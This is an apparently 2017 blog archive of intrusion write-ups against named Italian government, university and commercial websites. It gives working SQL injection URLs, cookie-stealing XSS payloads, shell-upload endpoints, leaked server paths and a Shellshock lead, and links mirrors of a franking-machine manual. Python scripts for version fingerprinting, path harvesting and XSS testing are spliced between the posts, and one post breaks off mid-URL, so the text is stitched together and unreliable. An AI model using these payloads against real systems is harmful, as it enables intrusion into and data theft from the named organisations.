
Showing posts from October, 2017

http://www.comuneguardiasanframondi.gov.it | SQL Injection, file/shell upload, system compromise

Joomla com_fabrik vulnerabilities. The SQL injection can be confirmed by triggering a database error:
http://www.comuneguardiasanframondi.gov.it//index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
archived: http://archive.is/1Up6B
Upload vulnerability:
http://www.comuneguardiasanframondi.gov.it/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0
archived: http://archive.is/6XtTl
Path (leaked from the errors): /web/htdocs/www.comuneguardiasanframondi.gov.it/

Poste italiane - PT100SV multi-purpose franking machine (Affrancatrice Polivalente, Elettronica Meccanica Sistemi S.P.A.) - operator's manual

PT100SV software manual, release A8C6. Download the manual here (mirrors):
filefactory.com http://www.filefactory.com/file/1u1o3fex14vt/pt100sv-manuale-operatore_MultiUpload.biz.pdf
share-online.biz http://www.share-online.biz/dl/GRQZM4YOUSV
sendmyway.com https://www.sendmyway.com/bgktennfvwqz
gigapeta.com http://gigapeta.com/dl/7495857a6745dc

http://lesim1.ing.unisannio.it | path disclosure, xss, sql injections, shell upload

http://lesim1.ing.unisannio.it
We can start by detecting the version manually (automated tools like joomscan give random values). http://lesim1.ing.unisannio.it/configuration.php-dist shows a 1.5.x release (archived: http://archive.is/VB6I3).
libraries/joomla/crypt/index.html is missing, so it's probably before Joomla! 1.5.26.
components/com_mailto/helpers/index.html is missing, so it's probably before Joomla! 1.5.23.
(Tip: I just used file and folder comparison with Beyond Compare, but you can also use Meld on Linux.)
To get the path we try to raise errors with wrong SQL queries. In this case we abuse the weblinks component and add the filter_order parameter, even though the site uses SEF URLs (which doesn't matter):
http://lesim1.ing.unisannio.it/index.php/it/link-mee/53-gruppi-di-ricerca-mee-delle-universita-italiane-?&filter_order=
to get output like this:
No valid database connection Unknown column '0' in 'order clause' SQL=SELECT * FROM jos_weblinks WHER
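The file-presence reasoning above (a placeholder index.html that only exists from a given release onwards is missing, so the install predates that release) can be automated. The script below is an added example and is not code from the original post. The fingerprint table and its "first seen" releases are taken from the post's two observations and are assumptions, not a verified Joomla changelog; extend it from your own file/folder diff of the release archives. The target is simulated with constructed sets of present paths so it runs offline; the http_exists helper is what you would plug in against a live host.

```python
"""Narrow down a Joomla 1.5.x release from which files exist on the target.

Added example, not the original post's code.  The fingerprint table is an
assumption built from the post's own observations.
"""
from dataclasses import dataclass
from typing import Callable, Iterable, Optional, Tuple
import urllib.error
import urllib.request
import uuid

Version = Tuple[int, ...]


@dataclass(frozen=True)
class Fingerprint:
    path: str        # relative to the site root
    first_seen: str  # release that introduced the file (assumption, see above)


# Assumed table, built from the post's two observations.
FINGERPRINTS = (
    Fingerprint("components/com_mailto/helpers/index.html", "1.5.23"),
    Fingerprint("libraries/joomla/crypt/index.html", "1.5.26"),
)


def parse_version(text: str) -> Version:
    return tuple(int(part) for part in text.split("."))


def fmt(v: Version) -> str:
    return ".".join(str(part) for part in v)


def narrow(exists: Callable[[str], bool],
           fingerprints: Iterable[Fingerprint] = FINGERPRINTS
           ) -> Tuple[Optional[Version], Optional[Version]]:
    """Return (lowest possible release, lowest excluded release).

    A present file means version >= first_seen; a missing one means
    version < first_seen.  Either bound is None when nothing constrains it.
    """
    lower: Optional[Version] = None
    upper: Optional[Version] = None
    for fp in fingerprints:
        v = parse_version(fp.first_seen)
        if exists(fp.path):
            lower = v if lower is None else max(lower, v)
        else:
            upper = v if upper is None else min(upper, v)
    return lower, upper


def describe(exists: Callable[[str], bool],
             fingerprints: Iterable[Fingerprint] = FINGERPRINTS) -> str:
    lower, upper = narrow(exists, fingerprints)
    if lower is None and upper is None:
        return "unknown"
    if lower is not None and upper is not None and lower >= upper:
        # A file from a later release exists while an earlier one is missing:
        # the install was patched piecemeal or the table is wrong.
        return "inconsistent"
    if lower is None:
        return f"< {fmt(upper)}"
    if upper is None:
        return f">= {fmt(lower)}"
    return f">= {fmt(lower)} and < {fmt(upper)}"


def http_exists(base_url: str, timeout: float = 10.0) -> Callable[[str], bool]:
    """Build an `exists` callback for a live target (not used offline).

    A site with a catch-all 200 page would make every fingerprint look present,
    so a random path is probed first and the check is refused if it answers 200.
    """
    base = base_url.rstrip("/") + "/"

    def status(path: str) -> int:
        req = urllib.request.Request(base + path, method="HEAD")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status
        except urllib.error.HTTPError as err:
            return err.code

    if status(f"{uuid.uuid4().hex}.html") == 200:
        raise RuntimeError("target answers 200 for missing files; presence checks are meaningless")
    return lambda path: status(path) == 200


# Constructed targets (offline).  lesim1 as the post describes it: both
# placeholder files missing.  A second install that has the com_mailto
# helper but not the crypt one.
LESIM1_FILES = {"index.php", "configuration.php-dist"}
OTHER_FILES = LESIM1_FILES | {"components/com_mailto/helpers/index.html"}

if __name__ == "__main__":
    print("lesim1:", describe(lambda p: p in LESIM1_FILES))
    print("other :", describe(lambda p: p in OTHER_FILES))
```

Each additional fingerprint tightens one of the two bounds; a result of "inconsistent" is itself useful, since it usually means individual files were updated by hand and the version string in configuration.php-dist cannot be trusted either.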

http://www.orientamento.unisannio.it | path disclosure, xss, sql injections, shell upload, system compromise

http://www.orientamento.unisannio.it
The website uses PHP-Nuke with some customizations (sometimes it detects that we are trying to abuse specific bugs). We can find the path from the Deprecated notices in various modules: /var/www/html/copus/home/copus/modules/
e.g. http://www.orientamento.unisannio.it/modules.php?name=Stories_Archive
Deprecated: Function ereg() is deprecated in /var/www/html/copus/home/copus/modules/Stories_Archive/index.php on line 25
register_globals seems to be On, so variables can be overridden through GET/POST requests.
Supposed version <= PHP-Nuke 6.9, since banners.php exists. In banners.php we have switch($op) { ... }
sample: http://www.orientamento.unisannio.it/banners.php?op=login
By using, for example, this URL: http://www.orientamento.unisannio.it/banners.php?op=Ok&login=[Sqlinjection]&pass=abc
the SQL is executed and we can dump the data instead of the banners. File via sql http://www.orientamento.unisannio.it/banners.
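Both this post and the lesim1 one recover the web root by reading it out of an error message (a PHP Deprecated notice here, a failed SQL query there). The script below is an added example, not code from the original posts: it strips HTML tags (PHP wraps the path in <b>), matches absolute Unix and Windows paths without picking up URL paths, and reports the longest directory common to everything found. The sample text is constructed; the first line is the notice quoted above, the other lines are made-up error output in the same shape.

```python
"""Pull leaked filesystem paths out of error output and derive the web root.

Added example, not the original posts' code.  SAMPLE is constructed.
"""
import re
from typing import Dict, List

# Not preceded by a word char, '.', ':', '/' or '\' so URL paths such as
# "http://host/index.php" are not matched.
UNIX_PATH = re.compile(r"(?<![\w.:/\\])(/(?:[^\s/'\"<>]+/)+[^\s/'\"<>]*)")
WIN_PATH = re.compile(r"(?<![\w.:/\\])([A-Za-z]:\\(?:[^\s\\'\"<>]+\\)*[^\s\\'\"<>]*)")
TAG = re.compile(r"<[^>]+>")
# Last path component with one of these extensions is treated as a file, so a
# directory named like a host (www.example.it) is not mistaken for one.
FILE_EXT = re.compile(r"\.(?:php\d?|phtml|inc|html?|asp|aspx|js|css|txt|log|xml)$", re.I)


def leaked_paths(text: str) -> Dict[str, List[str]]:
    """Return {'unix': [...], 'windows': [...]} in first-seen order, no duplicates."""
    plain = TAG.sub(" ", text)
    found: Dict[str, List[str]] = {}
    for style, pattern in (("unix", UNIX_PATH), ("windows", WIN_PATH)):
        seen: List[str] = []
        for m in pattern.finditer(plain):
            p = m.group(1).rstrip(".,;:)")  # trailing punctuation from prose
            if p not in seen:
                seen.append(p)
        if seen:
            found[style] = seen
    return found


def common_dir(paths: List[str], sep: str, ignore_case: bool = False) -> str:
    """Longest directory shared by all paths; files contribute their directory."""
    comp_lists = []
    for p in paths:
        comps = [c for c in p.split(sep) if c]
        if comps and not p.endswith(sep) and FILE_EXT.search(comps[-1]):
            comps = comps[:-1]
        comp_lists.append(comps)
    common = comp_lists[0]
    for comps in comp_lists[1:]:
        n = 0
        while n < min(len(common), len(comps)):
            a, b = common[n], comps[n]
            if ignore_case:
                a, b = a.lower(), b.lower()
            if a != b:
                break
            n += 1
        common = common[:n]
    joined = sep.join(common)
    return joined if sep == "\\" else sep + joined   # Windows keeps its drive prefix


def webroots(text: str) -> Dict[str, str]:
    """Common directory per path style found in `text`."""
    paths = leaked_paths(text)
    out: Dict[str, str] = {}
    if "unix" in paths:
        out["unix"] = common_dir(paths["unix"], "/")
    if "windows" in paths:
        out["windows"] = common_dir(paths["windows"], "\\", ignore_case=True)
    return out


# Constructed sample: line 1 is the notice quoted in the post, the rest are
# made-up lines of the same shape (a PHP warning, a referer, two IIS 404s).
SAMPLE = r"""
<b>Deprecated</b>:  Function ereg() is deprecated in <b>/var/www/html/copus/home/copus/modules/Stories_Archive/index.php</b> on line <b>25</b><br />
Warning: include(config.php): failed to open stream in /var/www/html/copus/home/copus/modules/News/index.php on line 12
Referer: http://www.orientamento.unisannio.it/modules.php?name=Stories_Archive
HTTP 404 - The file D:\inetpub\webs\carminevalentinoit\video\default.asp could not be found.
HTTP 404 - The file D:\inetpub\webs\carminevalentinoit\index.asp could not be found.
"""

if __name__ == "__main__":
    for style, root in webroots(SAMPLE).items():
        print(f"{style}: {root}")
```

The common directory is a lower bound on the web root: with errors from a single module you only learn that module's directory, and each additional leaking page narrows it further, which is why collecting several notices (as the post does across "various modules") beats reading one.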

cineca.it | XSS

http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=[XSS]&btnSubmit=Cerca
e.g. http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=<script>alert(document.cookie);</script>&btnSubmit=Cerca
archived with sample JavaScript text: http://archive.is/To5A4

http://www.carminevalentino.it/ | xss

http://www.carminevalentino.it/
The path can be seen in the 404 error pages: D:\inetpub\webs\carminevalentinoit\
XSS: http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg[XSS]&pg=1
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);alert(%22xss;&pg=1
and we can place any video in the content. Example:
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);s1.addVariable(%22file%22,%22http://flashedu.rai.it/raistoria/RES/16_06_1977.mp4%22);//&pg=1
shortened URL: https://goo.gl/sWhg1P
archived URL: http://archive.is/25Bw8
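The payloads above work because arg is written straight into a JavaScript string literal (s1.addVariable("file","...")), so a double quote ends the literal and whatever follows is executed as code; this is a different context from the plain HTML reflection in the cineca post. The code below is an added example, not code from the original post or from the site: it simulates that server-side concatenation in Python next to a hardened version, and includes a small check that lexes the first JS string literal to tell whether a value broke out of it. The payloads are the post's own; the page skeleton is constructed.

```python
"""Vulnerable vs hardened rendering of a value into a JS string literal.

Added example, not the site's ASP code.  PREFIX/SUFFIX are a constructed
skeleton of the page the post describes.
"""
import json

PREFIX = '<script>s1.addVariable("file",'
SUFFIX = ');</script>'

# Payloads from the post, URL-decoded.
XSS_PAYLOAD = '");alert("xss;'
VIDEO_PAYLOAD = '");s1.addVariable("file","http://flashedu.rai.it/raistoria/RES/16_06_1977.mp4");//'


def vulnerable_render(arg: str) -> str:
    """Raw concatenation into a JS string literal (the pattern the post abuses)."""
    return f'{PREFIX}"{arg}"{SUFFIX}'


def hardened_render(arg: str) -> str:
    """JSON-encode for the JS string context, then break '</' so the value can
    never end the enclosing <script> element (JSON alone does not prevent that)."""
    literal = json.dumps(arg).replace("</", "<\\/")
    return f"{PREFIX}{literal}{SUFFIX}"


def js_string_end(src: str, start: int) -> int:
    """Index just past the double-quoted JS string literal starting at src[start].
    Backslash escapes are honoured; raises ValueError if unterminated."""
    if src[start] != '"':
        raise ValueError("no string literal at start")
    i = start + 1
    while i < len(src):
        c = src[i]
        if c == "\\":
            i += 2          # skip the escaped character, whatever it is
            continue
        if c == '"':
            return i + 1
        i += 1
    raise ValueError("unterminated string literal")


def breaks_out(page: str) -> bool:
    """True when the injected value changed the page's syntax: either code
    follows the first string literal, or the literal contains '</script',
    which the HTML parser acts on before any JS quoting is considered."""
    start = page.index(PREFIX) + len(PREFIX)
    try:
        end = js_string_end(page, start)
    except ValueError:
        return True     # unbalanced quotes: the value broke the syntax
    literal = page[start:end]
    return page[end:] != SUFFIX or "</script" in literal.lower()


if __name__ == "__main__":
    for name, payload in (("xss", XSS_PAYLOAD), ("video", VIDEO_PAYLOAD)):
        print(name, "vulnerable:", breaks_out(vulnerable_render(payload)),
              "hardened:", breaks_out(hardened_render(payload)))
```

The hardened version shows the two things a JS string context needs: a serialiser that escapes quotes and backslashes for that context (HTML-entity encoding would not help here, since the browser never HTML-decodes script bodies), and a separate guard against the value ending the script element.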

http://www.tourism-solutions.tech/ | xss - system compromise

http://www.tourism-solutions.tech regularly sends spam emails. There's a fake unsubscribe script that reports a successful removal for any input, even a simple XSS payload:
http://www.tourism-solutions.tech/unscribe.php?id=%3Cscript%3Ealert('xss');%3C/script%3Eyourmail.com
The mail server can be exploited with an old remote exploit for Postfix on Debian Linux (Shellshock).